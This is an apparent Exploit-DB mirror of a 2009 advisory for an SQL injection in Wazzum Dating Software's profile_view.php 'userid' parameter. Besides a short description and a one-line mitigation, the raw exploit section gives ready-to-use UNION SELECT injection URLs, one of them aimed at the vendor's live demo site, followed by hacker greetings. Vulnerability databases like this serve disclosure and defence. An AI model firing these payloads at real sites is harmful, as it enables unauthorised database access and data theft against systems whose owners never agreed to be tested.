header-logo
Suggest Exploit
vendor:
Dating Software
by:
nuclear
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Dating Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Wazzum Dating Software (userid) SQL Injection Vulnerability

Wazzum Dating Software is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries and gain access to unauthorized information. This issue affects the 'userid' parameter of the 'profile_view.php' script.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

#Wazzum Dating Software (userid) SQL Injection Vulnerability


#Author: nuclear


#site:
http://www.wazzum.com/


#vuln:
http://localhost/[path]/profile_view.php?userid=-1 union select 1,2,3,4,5,@@version /*


#demo:
http://www.wazzum.com/dating_demo/profile_view.php?userid=-1%20union%20select%201,2,3,4,5,@@version%20/*


#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

# milw0rm.com [2009-01-26]